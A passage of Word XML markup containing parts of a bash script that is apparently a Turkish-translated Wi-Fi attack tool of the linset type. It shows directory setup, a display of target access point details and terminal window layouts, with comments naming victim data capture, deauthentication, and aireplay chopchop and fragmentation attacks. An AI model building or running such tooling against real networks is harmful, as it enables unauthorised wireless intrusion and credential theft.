    <w:p w14:paraId="4A85F281" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB52E96" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C8DD4D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$salir" = "1" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE9E47" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6AD253" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30138D66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79245453" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0,025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3DEEE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BFDCB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48542A77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5FEE0047" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>checkdependences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D96F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7AE515CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Direkt Klasörü Oluşturur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41829A1D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if [ ! -d $DUMP_PATH ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F2460" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>mkdir $DUMP_PATH &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03488C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02FC3F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1993F17A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5BA3A112" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2F6721E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Seçili AP'nin bilgilerini göster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B959F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function infoap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF7C947" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1A4CD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}' | tr [:upper:] [:lower:]`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C178D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | cut -d " " -f 5-`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66305636" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "AP HEDEF BİLGİSİ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67683539" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CEC338" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "                     "$yesil"SSID"$yenidenrenklendir" = $Host_SSID / $Host_ENC"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E240A51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "                    "$yesil"Canal"$yenidenrenklendir" = $channel"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ACB07F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "                      "$yesil"Hız"$yenidenrenklendir" = ${speed:2} Mbps"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FBE7A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "                      "$yesil"MAC"$yenidenrenklendir" = $mac (\e[1;33m$Host_MAC_MODEL"$yenidenrenklendir")"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F1F01E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54958690" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07583016" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5D397370" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># BASLAMA YERI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E796A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4654964C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Ekipmanımızın optimum çözünürlüğü tespit edilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616C3B1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function setresolution {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E3BDD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="142B499B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resA {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB37B40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Sol üst pencere +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C2C15" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 90x13+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83CF57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Sağ üst pencere -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5E870" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 83x26-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2F47E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A5D85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 90x24+0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10325F55" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom right window -0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FF334" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 75x12-0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1FBFE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry 91x42+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CFA8B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHTBIG="-geometry 83x26-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733473F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E520142" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0706BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resB {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A3843" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper left window +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D0D6C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 92x14+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8D314" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper right window -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6A738" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 68x25-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139DA0C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136EDBDF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 92x36+0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5C7DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom right window -0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601388F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 74x20-0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3A689" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry 100x52+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43788E6A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHTBIG="-geometry 74x30-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC5EA4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C75CCC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resC {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FBFD3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper left window +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAED799" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 100x20+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791C92C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper right window -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF667E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 109x20-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BAA84" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C797360" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 100x30+0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C1999" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom right window -0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247EAF77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 109x20-0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E3A81" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry  100x52+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B72B46" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHTBIG="-geometry 109x30-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03F00D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CF179" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resD {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68851F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper left window +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7F21E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 110x35+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A04C68" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper right window -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FEDA7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 99x40-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6CD82B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD9B72" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 110x35+0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66315C99" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom right window -0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA40E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 99x30-0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58F0A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry 110x72+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61141CFD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHTBIG="-geometry 99x40-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA90135" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA02C49" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resE {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFEB27" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper left window +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CE9BF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 130x43+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E200F2A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper right window -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2A2BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 68x25-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59F663" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E29F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 130x40+0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD38F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 132x35-0-0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346EE074" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry 130x85+0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA586B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHTBIG="-geometry 132x48-0+0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D6296" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092BDB01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>function resF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D65EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper left window +0+0 (size*size+position+position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBB6D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFT="-geometry 100x17+0+0" # capturando datos de victima ...  ( VENTANA AIRODUMP ATAUQE )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F617705" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Upper right window -0+0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FE7C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPRIGHT="-geometry 90x27-0+0" # desautenticando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B01E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom left window +0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953C6A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMLEFT="-geometry 100x30+0-0" # aireplay , CHOPCHOP , FRAGMENTACION... ( VENTANA BAJO CAPTURAS DE AIRODUMP )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF85A5F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Bottom right window -0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFAB5B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>BOTTOMRIGHT="-geometry 90x20-0-0" # ASOCIANDO CON... ( VENTANA ROJA )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D886B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TOPLEFTBIG="-geometry  100x70+0+0" # escaneando objetivos ... ( ESCANEO INICIAL )</w:t>
      </w:r>
    </w:p>
